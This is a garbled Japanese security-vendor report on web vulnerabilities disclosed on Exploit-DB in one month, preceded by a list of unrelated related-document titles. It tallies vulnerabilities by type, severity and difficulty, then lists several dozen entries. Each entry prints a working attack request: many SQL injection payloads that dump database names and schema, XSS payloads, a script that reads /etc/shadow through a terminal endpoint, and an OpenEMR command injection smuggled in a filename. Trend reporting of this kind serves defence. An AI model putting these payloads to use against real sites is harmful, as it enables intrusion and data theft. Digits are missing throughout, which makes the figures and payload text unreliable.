EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 0

Similar documents
最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

PowerPoint Presentation

最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

shio_ PDF

¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ

実施していただく前に

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

FileMaker Server Getting Started Guide

96 8 PHPlot 1. ( 8.1) 4 1: // 2: // $_SERVER[ HTTP_REFERER ]... 3: // $_SERVER[ HTTP_USER_AGENT ]... 4: // $_SERVER[ REMOTE_ADDR ]... ( ) 5: // $_SERV

Microsoft Word - D JP.docx

Microsoft Word - Live Meeting Help.docx

Oracle Calendar Oracle Collaboration Suite 2(9.0.4) Creation Date: Jun 04, 2003 Last Update: Nov 18, 2003 Version:

Northern Lights Server

Oracle Fail Safe For Windows NT and Windows 2000 リリース・ノート、リリース 3.1.2

untitled

Oracle Change Management Pack, Oracle Diagnostics Pack, Oracle Tuning Packインストレーション・ガイド リリース2.2

Plan of Talk CAS CAS 2 CAS Single Sign On CAS CAS 2 CAS Aug. 19, 2005 NII p. 2/32

CAS Yale Open Source software Authentication Authorization (nu-cas) Backend Database Authentication Authorization Powered by A

Windowsユーザーの為のOracle Database セキュリティ入門

RouteMagic Controller( RMC ) 3.6 RMC RouteMagic RouteMagic Controller RouteMagic Controller MP1200 / MP200 Version 3.6 RouteMagic Controller Version 3

untitled

konicaminolta.co.jp PageScope Net Care

nopcommerce Adobe Flash ( 1 ) 1 nopcommerce 2.2 ( [5, p.3-4] )

Oracle Application Server 10g(9

FileMaker Server 9 Getting Started Guide

RouteMagic Controller RMC-MP200 / MP Version

_02-5.ppt

82801pdf.pqxp

untitled

nakayama15icm01_l7filter.pptx

TM-T88VI 詳細取扱説明書

Microsoft SharePoint Server 2010SharePoint Server 2010Web SharePointSharePoint Server 2010 SharePoint SharePoint Server 2010 SharePoint SharePoint Sha

WebOS aplat WebOS WebOS 3 XML Yahoo!Pipes Popfry UNIX grep awk XML GUI WebOS GUI GUI 4 CUI

PX-504A

CAC

CLUSTERPRO ファイルサーバ監視オプション編

FileMaker Server Getting Started Guide

2 Java 35 Java Java HTML/CSS/JavaScript Java Java JSP MySQL Java 9:00 17:30 12:00 13: 項目 日数 時間 習得目標スキル Java 2 15 Web Java Java J

morita.PDF

Oracle Web Conferencing Oracle Collaboration Suite 2 (9.0.4) Creation Date: May 14, 2003 Last Update: Jan 21, 2005 Version: 1.21

Report Template

FileMaker Server Getting Started Guide

2014_Apr_FSLP_A4

EPSON PX-503A ユーザーズガイド

PLESK_START_UP_GUIDE.indd

PX-434A/PX-404A

EP-704A

受動的攻撃について

Oracle Application Server 10g( )インストール手順書

VMware Horizon

m_gtstrt_exprss_ibmbook.ps

"CAS を利用した Single Sign On 環境の構築"

RouteMagic Controller RMC-MP200 / MP Version

Cleaner XL 1.5 クイックインストールガイド

<Documents Title Here>

PX-403A

KWCR3.0 instration

FileMaker ODBC and JDBC Guide

WebClass

Transcription:

07.

EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 07年月に公開されたExploit-DBの脆弱性報告は 総件でした 月に公開された脆弱性数(5件)と比べると大幅で 約7割以上 上昇しました こういう上昇の原因はほとんどSQL injection SQLインジェクション 攻撃の増加によります また 月に公開されたSQL injection SQLインジェクション 攻撃の場合 完全に新しい方式ではなく ほとんどが既に公開されていた方式と同一な脆弱性や攻撃パターンでした SQL injection SQLインジェクション 攻撃は 攻撃が成功する場合 大きな被害を起こら せるが 比較的に攻撃コストが低いため 多くの攻撃者らが発展させて悪用しています こういう脆弱性を持続的に予防し セキュリティ性を維持させるための効果的な対応方案としてウェブアプリケーションファイアウォールを活用した深層防護(Defense indepth)を具現する 考えなければなりません. 脆弱性別 脆弱性カテゴリ ファイルアップロード(File Upload) ローカル ファイルインクルード(Local File Inclusion: LFI) クロスサイトスクリプティング(Cross Site Scripting: XSS) ディレクトリトラバーサル(Directory Traversal) コマンドインジェクション(Command Injection) SQLインジェクション(SQL Injection) 合計 脆弱性別 0 6 98 危険度別 98 00 4 80 60. 危険度別 危険度 早急対応要 高 中 合計 06 4 割合 9.8%.54%.65% 00.00% 40 06 早急対応要 0 高. 攻撃実行の難易度別 中 6 0 難易度 難 中 易 合計 5 9 6 割合 4.4% 8.4% 4.6% 00.00% 攻撃実行の難易度別 4. 主なソフトウェア別脆弱性発生 ソフトウェア名 vbulletin Readymade Video Sharing Script FS Makemytrip Clone FS Grubhub Clone Multireligion Responsive Matrimonial Xerox DC60 EFI Fiery Controller Webtools Accesspress Anonymous Post Pro FS Amazon Clone Multivendor Penny Auction Clone Script FS Crowdfunding Script Car Rental Script FS Care Clone Joomla! Component User Bench FS Monster Clone Kickstarter Clone Acript FS Trademe Clone Professional Service Script FS Thumbtack Clone Advanced Real Estate Script PHP Melody Resume Clone Script MistServer Movie Guide Artica Web Proxy FAQ Pro Techno Portfolio Management Panel Hot Scripts Clone Readymade Classifieds Script Laundry Booking Script FS Lynda Clone Opensource Classified Ads Script WinduCMS FS Expedia Clone FS Shaadi Clone Multiplex Movie Theater Booking Script FS Indiamart Clone MLM Forex Market Plan Script FS Facebook Clone Muslim Matrimonial Script OpenEMR Vanguard DomainSale PHP Script FS Ebay Clone Website Auction Marketplace Joomla! Component JB Visa Realestate Crowdfunding Script Joomla! Component NextGen Editor FS Stackoverflow Clone Sendroid FS Shutterstock Clone DotNetNuke DreamSlider FS Quibids Clone Foodspotting Clone Script ソフトウェア名 Nearbuy Clone Script Secure E-commerce Script Cab Booking Script Lawyer Search Script Chartered Accountant Booking Script Online Exam Test Application Script Child Care Script PHP Multivendor Ecommerce CMS Auditor Website Readymade PHP Classified Script Co-work Space Search Script Responsive Realestate Script Consumer Complaints Clone Script Responsive Events & Movie Ticket Booking Script Entrepreneur Job Portal Script Single Theater Booking Script Doctor Search Script Entrepreneur Bus Booking Script E-commerce MLM Software MLM Forced Matrix Entrepreneur Dating Script Groupon Clone Script Event Calendar Category Script Advanced World Database FS Linkedin Clone Basic Job Site Script Video Gallery Joomla! Component Jbuildozer FS Freelancer Clone Question And Answer Bus Booking Script Linksys WVBR0 Paid To Read Script FS Gigs Script Piwigo FS Foodpanda Clone ITGuard-Manager Advance BB Script Cells Blog Advance Online Learning Management Script Joomla! Component Guru Pro Affiliate MLM Script Joomla! Component My Projects Basic BB Script BEIMS ContractorWeb Beauty Parlour Booking Script Biometric Shift Employee Management System Facebook Clone Script SilverStripe CMS Food Order Script Easy!Appointments Yoga Class Script FS Olx Clone Freelance Website Script 合計 6 5 難 中 易 9 主なソフトウェア別脆弱性発生 vbulletin Readymade Video Sharing Script FS Makemytrip Clone FS Grubhub Clone Multireligion Responsive Matrimonial Xerox DC60 EFI Fiery Controller Webtools Accesspress Anonymous Post Pro FS Amazon Clone Multivendor Penny Auction Clone Script FS Crowdfunding Script Car Rental Script FS Care Clone Joomla! Component User Bench FS Monster Clone

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07--0 405 XSS 易高 MistServer. - XSS 脆弱性 /admin/api?command={"authorize":{"password":"666","usern ame":"<script>alert(document.body.innerhtml)</script>"}} MistServer MistServer. 07--0 406 Command Injection 中早急対応要 Artica Web Proxy.06 - Command Injection 脆弱性 /freeradius.users.php?username-formid=%c%fscript%e%cscript%evar%0xhr=new%0x MLHttpRequest();xhr.onreadystatechange=function(){if(xhr.sta tus==00){alert(xhr.responsetext);}};xhr.open(%7post%7, %7https://ip:port/system.terminal.php%7,true);xhr.setReq uestheader(%7content-type%7,%7application/x-wwwformurlencoded%7);xhr.send(%7cmdline=cat%0/etc/shadow %7);%C%Fscript%E%Cscript%E Artica Web Proxy Artica Web Proxy.06 07--05 4 SQL Injection 中早急対応要 Techno Portfolio Management Panel.0 - 'id' /single.php?id=- 4++/*!08888UNION*/(/*!08888SELECT*/0x89,0x8 9,CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()), 0x849,0x859,0x869,0x879,(/*!08888SELECT */+GROUP_CONCAT(table_name+SEPARATOR+0xc67e) +/*!08888FROM*/+INFORMATION_SCHEMA.TABLES+/*!088 88WHERE*/+TABLE_SCHEMA=DATABASE()),0x899,0x8 09,0x89,0x89,0x89)-- Techno Portfolio Management Panel Techno Portfolio Management Panel.0 07--05 4 SQL Injection 中早急対応要 Readymade Classifieds Script.0 /listings.php?catid=- ++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0, (/*!08888select*/+count(*)/*!08888from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0888 8table_name*/,0xc6c69e,),/*!08888column_name*/,0xa a,)),@,)))-- Readymade Classifieds Script Readymade Classifieds Script.0 07--06 4 SQL Injection 易早急対応要 FS Makemytrip Clone - 'id' /pages.php?id= OR SLEEP(5) FS Makemytrip Clone FS Makemytrip Clone 07--06 44 LFI 中中 WinduCMS. - Local File Disclosure 脆弱性 POST /contact_page?mn=contactform.message.negative HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 WinduCMS WinduCMS. email=test@test.com&content=<img src="/etc/passwd" 07--06 45 SQL Injection 中早急対応要 FS Shaadi Clone - 'token' /view_profile.php?token=-5886' UNION ALL SELECT NULL,CONCAT(0x767877,0x65755a46504d6a54657 874d765a594a559556c44f4d76c45444958686e44555 64770567,0x77078707),NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL-- FS Shaadi Clone FS Shaadi Clone 07--07 47 SQL Injection 中早急対応要 - 'id' /show_misc_video.php?id=id=-58 UNION ALL SELECT NULL,CONCAT(0x7766b67,0x454e4e656f6a7a4676744c 59447955a49667047666686f6d6b46774d6745a7a4e 585767065,0x7707a707),NULL,NULL,NULL,NULL,NULL,N ULL-- 07--07 48 SQL Injection 中早急対応要 FS Facebook Clone - 'token' /group.php?token=-86' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7787677,0x546d597a667 557a70475a50454e7765449574c76677746e7a557579 7467574a6d5954468,0x7766a6a7),NULL,NULL,NULL, NULL,NULL-- FS Facebook Clone FS Facebook Clone 07--07 4 Command Injection 中早急対応要 OpenEMR 5.0.0 - OS Command Injection POST /interface/fax/fax_dispatch.php?scan=x HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 OpenEMR OpenEMR 5.0.0 form_save=&form_cb_copy=&form_cb_copy_type=&form _images[]=x&form_filename=' ls -al '&form_pid= 07--08 45 SQL Injection 中早急対応要 DomainSale PHP Script.0 - 'id' /domain.php?id=4'++/*!union*/(/*!select*/ +0x89,/*!50000CONCAT_WS*/(0x0a0,USER(),DAT ABASE(),VERSION()),0x89,(/*!08888Select*/+export_set (5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(informat ion_schema.columns)where@:=export_set(5,export_set(5,@,/ *!08888table_name*/,0xc6c69e,),/*!08888column_nam e*/,0xaa,)),@,)),0x859,0x869,0x879,0x88 9,0x899,0x809,0x89,0x89)-- DomainSale PHP Script DomainSale PHP Script.0 07--08 48 SQL Injection 中早急対応要 Website Auction Marketplace.0.5 - 'cat_id' /single-cause.php?pid=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(), (),(),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSI ON()),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6 ),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9 ),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5))-- Website Auction Marketplace Website Auction Marketplace.0.5 07--08 49 SQL Injection 中早急対応要 Realestate Crowdfunding Script.7. - 'pid' /single-cause.php?pid=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(), (),(),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSI ON()),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6 ),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9 ),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5))-- Realestate Crowdfunding Script Realestate Crowdfunding Script.7. 07--08 440 SQL Injection 中早急対応要 FS Thumbtack Clone.0 - 'cat' / 'sc' /browse-category.php?cat=- 9a87ff679afe7d98a67b754c'++/*!UNION */(/*!SELECT*/(),CONCAT_WS(0x0a0,USER(),DAT ABASE(),VERSION()),(),(4))-- /browse-scategory.php?sc=- 40cb96ac59075b964b075d4b70'++/*!UNI ON*/+/*!SELECT*/+,,CONCAT_WS(0x0a0,USER( ),DATABASE(),VERSION()),4,5,6,7,8,9-- FS Thumbtack Clone FS Thumbtack Clone.0 07--08 44 SQL Injection 中早急対応要 FS Stackoverflow Clone.0 - 'keywords' POST /question/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 FS Stackoverflow Clone FS Stackoverflow Clone.0 keywords='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e,0x4948544e05454e444e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''='

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07--08 44 SQL Injection 中早急対応要 FS Shutterstock Clone.0 - 'keywords' SQL Injection POST /Category/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 keywords='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e,0x4948544e05454e444e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''=' FS Shutterstock Clone FS Shutterstock Clone.0 07--08 44 SQL Injection 易早急対応要 FS Quibids Clone.0 /itechd.php?productid=609 AND 65=65 FS Quibids Clone FS Quibids Clone.0 07--08 444 SQL Injection 中早急対応要 FS Olx Clone.0 - 'scat' / 'pid' /subpage.php?scat=5'++union+all+select+,,,4,(sele CT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(I NFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0 x696e666f76d674696f6e5f7668656d6)and(0x00)in( @x:=concat(@x,lpad(@nr:=@nr+,4,0x0),0xa0,table_ name,0xc67e))))x),6,7,8,9,0,,,,4,5,6,7,8, 9,0,,,,4,5,6-- FS Olx Clone FS Olx Clone.0 07--08 445 SQL Injection 中早急対応要 FS Monster Clone.0 - 'Employer_Details.php?id' /Employer_Details.php?id=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(SELE CT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(I NFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0 x696e666f76d674696f6e5f7668656d6)and(0x00)in( @x:=concat(@x,lpad(@nr:=@nr+,4,0x0),0xa0,table_ name,0xc67e))))x),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),() )-- FS Monster Clone FS Monster Clone.0 07--08 446 SQL Injection 中早急対応要 FS Makemytrip Clone.0 - 'fl_orig' / 'fl_dest' /show-flightresult.php?&fl_orig=7'++union(select(),(),(),(4),(5),(6), (7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(SELECT+GROUP_CONCAT(table_name+SEPA RATOR+0xc67e)+FROM+INFORMATION_SCHEMA.TABL ES+WHERE+TABLE_SCHEMA=DATABASE()),(5),(6),(7),( 8))-- FS Makemytrip Clone FS Makemytrip Clone.0 07--08 468 SQL Injection 易早急対応要 Nearbuy Clone Script. - 'search' /category_list.php?search=s%' AND 775=775 AND '%'=' Nearbuy Clone Script Nearbuy Clone Script. 07--08 469 SQL Injection 中早急対応要 Cab Booking Script.0 - 'city' /servicelist?city=/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4,5,6, 7,8,9,0,,,CONCAT_WS(0x0a0,USER(),DATABASE (),VERSION()),4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--&main_search= Cab Booking Script Cab Booking Script.0 07--08 470 SQL Injection 中早急対応要 Chartered Accountant Booking Script.0 - 'city' /servicelist?city=/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4,5,6, 7,8,9,0,,,CONCAT_WS(0x0a0,USER(),DATABASE (),VERSION()),4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--&main_search= Chartered Accountant Booking Script Chartered Accountant Booking Script.0 07--08 47 SQL Injection 中早急対応要 Child Care Script.0 - 'city' /list?city=+/*!union*/+/*!select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,concat_ WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8, 9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,4 8,49,50,5,5--&main_search= Child Care Script Child Care Script.0 07--08 47 SQL Injection 中早急対応要 07--08 47 SQL Injection 易早急対応要 07--08 474 SQL Injection 中早急対応要 CMS Auditor Website.0 Co-work Space Search Script.0 - 'city' Consumer Complaints Clone Script.0 - 'id' /news-detail/47%0and%0=-- CMS Auditor Website CMS Auditor Website.0 /list?city=%0and%0=--&main_search= Co-work Space Search Script Co-work Space Search Script.0 /other-user-profile.php?id=- '++/*!50000UNION*/(SELECT(),/*!CONCAT_WS*/(0 x0a0,user(),version()),(),(4),(5),(6),(7),(8),(9),(0),() Consumer Complaints Clone Script Consumer Complaints Clone Script.0,(),(),(4),(5),(6),(7),(8))-- 07--08 475 SQL Injection 中早急対応要 Entrepreneur Job Portal Script.0.6 - 'jobsearch_all.php?rid' /jobsearch_all.php?rid=- '++UNION(SELECT(),(),(),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(informatio n_schema.columns)where@:=export_set(5,export_set(5,@,/*! 08888table_name*/,0xc6c69e,),/*!08888column_name* /,0xaa,)),@,)),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5 ),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8 ),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4 ),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5),(5),(5),(54 ))-- Entrepreneur Job Portal Script Entrepreneur Job Portal Script.0.6 07--08 476 SQL Injection 中早急対応要 Doctor Search Script.0 - 'city' /list?city=/*!union*/+/*!select*/+,,,4,5,6, 7,8,9,0,,,,4,5,6,7,8,9,0,,,,CONCAT_ WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8, 9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,4 8,49,50,5,5--&main_search= Doctor Search Script Doctor Search Script.0 /service_detail.php?pid=- 6'++UNION(SELECT(),(/*!08888Select*/+export_set(5,@:=0, (/*!08888select*/+count(*)/*!08888from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0888 8table_name*/,0xc6c69e,),/*!08888column_name*/,0xa a,)),@,)),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),( 5),(6),(7))--+- 07--08 477 SQL Injection 中早急対応要 E-commerce MLM Software.0 /event_detail.php?eventid=- 8'++UNION+ALL+SELECT+,(SELECT+GROUP_CONCAT(tabl e_name+separator+0xc67e)+from+information_ SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),, 4,5,6,7-- E-commerce MLM Software E-commerce MLM Software.0 /news_detail.php?newid=- 7'++UNION+ALL+SELECT+,(SELECT(@x)FROM(SELECT(@x: =0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA. COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f6646d696e) AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+,,0x0),0xa0,column_name,0xc67e)))))x),,4,5,6-- 07--08 478 SQL Injection 中早急対応要 Entrepreneur Dating Script.0. - 'marital' / 'gender' / 'country' / 'profileid' /search_result.php?marital=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),( 5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),( 5),(5),(5),(54),(55),(56),(57),(58),(59),(60),(6),(6),(6),( 64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!0 8888select*/+count(*)/*!08888from*/(information_schema.c olumns)where@:=export_set(5,export_set(5,@,/*!08888table _name*/,0xc6c69e,),/*!08888column_name*/,0xaa,)), @,)),(69),(70),(7),(7),(7),(74),(75),(76),(77),(78),(79),(80 ),(8),(8),(8),(84),(85),(86),(87),(88),(89),(90),(9),(9),(9 ))--&submit Entrepreneur Dating Script Entrepreneur Dating Script.0. 07--08 479 SQL Injection 中早急対応要 Event Calendar Category Script.0 - 'city' /event-list?city=- 76'+UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),CON CAT_WS(0x0a0,USER(),DATABASE(),VERSION()),(5),(6) Event Calendar Category Script Event Calendar Category Script.0,(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5),(5),(5),(54))--&main_search=

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07--08 449 SQL Injection 中早急対応要 FS Linkedin Clone.0 - 'grid' / 'fid' / 'id' /group.php?grid=- '++UNION+ALL+SELECT+,,,(SELECT(@x)FROM(SELECT(@ x:=0x00),(@nr:=0),(select(0)from(information_schem A.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d6746 FS Linkedin Clone FS Linkedin Clone.0 96f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD (@NR:=@NR+,4,0x0),0xa0,table_name,0xc67e))))x),5,6,7,8,9,0,,,,4-- 07--08 450 SQL Injection 中早急対応要 FS Indiamart Clone.0 - 'token' / 'id' / 'c' 07--08 45 SQL Injection 中早急対応要.0 - 'f' / 's' / 'id' /catcompany.php?token=- 79b5bad6ab90ce06895c9bde'++UNION(SELE CT(),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0 FS Indiamart Clone FS Indiamart Clone.0 xc67e)+from+information_schema.tables+wher E+TABLE_SCHEMA=DATABASE()),(),(4),(5),(6))-- /movie.php?f=- 0++UNION(SELECT(),(),(),(4),(5),(6),(SELECT+GROUP_C ONCAT(table_name+SEPARATOR+0xc67e)+FROM+INFO RMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DAT ABASE()),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),( 9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4))--.0 07--08 45 SQL Injection 中早急対応要 FS Grubhub Clone.0 - 'keywords' POST /food/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75 keywords=' UNION ALL SELECT,,,CONCAT(0x4948544e05454e444e),(/*!08888S elect*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!088 88from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!08888table_name*/,0xc6c69e,),/*!0 8888column_name*/,0xaa,)),@,)),6,7,8,9,0,,,,4,5,6,7,8,9,0,,-- FS Grubhub Clone FS Grubhub Clone.0 07--08 45 SQL Injection 中早急対応要 FS Groupon Clone.0 - 'id' /item_details.php?id=- ++UNION+ALL+SELECT+,,,4,5,6,7,(/*!08888Select*/+ex port_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/( FS Grubhub Clone FS Grubhub Clone.0 information_schema.columns)where@:=export_set(5,export_s et(5,@,/*!08888table_name*/,0xc6c69e,),/*!08888colu mn_name*/,0xaa,)),@,)),9,0,,,,4,5,6,7-- 07--08 454 SQL Injection 中早急対応要 FS Gigs Script.0 - 'cat' / 'sc' /browse-category.php?cat=- 8c4ca48a0b980dcc509a6f75849b'++/*!50000UNIO FS Gigs Script FS Gigs Script.0 N*/+/*!50000SELECT*/+,CONCAT_WS(0x0a0,USER(),D ATABASE(),VERSION()),,4,5-- 07--09 455 SQL Injection 中早急対応要 FS Freelancer Clone.0 - 'profile.php?u' /profile.php?u=c4ca48a0b980dcc509a6f75849b'++union+all+sele CT+,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0 xc67e)+from+information_schema.tables+wher FS Freelancer Clone FS Freelancer Clone.0 E+TABLE_SCHEMA=DATABASE()),,4,5,6,7,8,9,0,,,, 4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4,5-- 07--09 456 SQL Injection 中早急対応要 FS Ebay Clone.0 - 'id' / 'sub_category_id' / 'category_id' /product.php?id=- 9++UNION(SELECT(),(),(SELECT+GROUP_CONCAT(table_n ame+separator+0xc67e)+from+information_sch FS Ebay Clone FS Ebay Clone.0 EMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9), (0))-- 07--09 457 SQL Injection 中早急対応要 FS Crowdfunding Script.0 - 'latest_news_details.php?id' /latest_news_details.php?id=- 4'++UNION+ALL+SELECT+,,,4,5,CONCAT_WS(0x0a0, USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_se t(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(informa FS Crowdfunding Script FS Crowdfunding Script.0 tion_schema.columns)where@:=export_set(5,export_set(5,@,/ *!08888table_name*/,0xc6c69e,),/*!08888column_nam e*/,0xaa,)),@,))-- 07--09 458 SQL Injection 中早急対応要 FS Care Clone.0 - 'jobfrequency' / 'jobtype' /searchjob.php?jobtype=%0and%0=-- &jobfrequency=%0and%0=-- FS Care Clone FS Care Clone.0 07--09 459 SQL Injection 中早急対応要 FS Amazon Clone.0 /p/verayari/- 9++UNION(SELECT(),(),CONCAT_WS(0x0a0,USER(),DA FS Amazon Clone FS Amazon Clone.0 TABASE(),VERSION()),(4),(5),(6),(7),(8),(9),(0),(),(),(), (4),(5),(6))-- 07--09 460 SQL Injection 中早急対応要 FS Trademe Clone.0 - 'search' / 'id' /search_item.php?search=s'++union+all+select+,,,4,5, CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()),7,8, FS Trademe Clone FS Trademe Clone.0 9,0,,,,4-- 07--09 46 SQL Injection 中早急対応要 FS Expedia Clone.0 - 'fl_orig' / 'fl_dest' / 'id' /show-flightresult.php?fl_orig=5'++union(select(),(),(),(4),(5),(6),( 7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0), (),(),(),(/*!08888Select*/+export_set(5,@:=0,(/*!0888 FS Expedia Clone FS Expedia Clone.0 8select*/+count(*)/*!08888from*/(information_schema.colu mns)where@:=export_set(5,export_set(5,@,/*!08888table_na me*/,0xc6c69e,),/*!08888column_name*/,0xaa,)),@, )),(5),(6),(7),(8))-- 07--09 46 SQL Injection 中早急対応要 FS Foodpanda Clone.0 POST /food/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 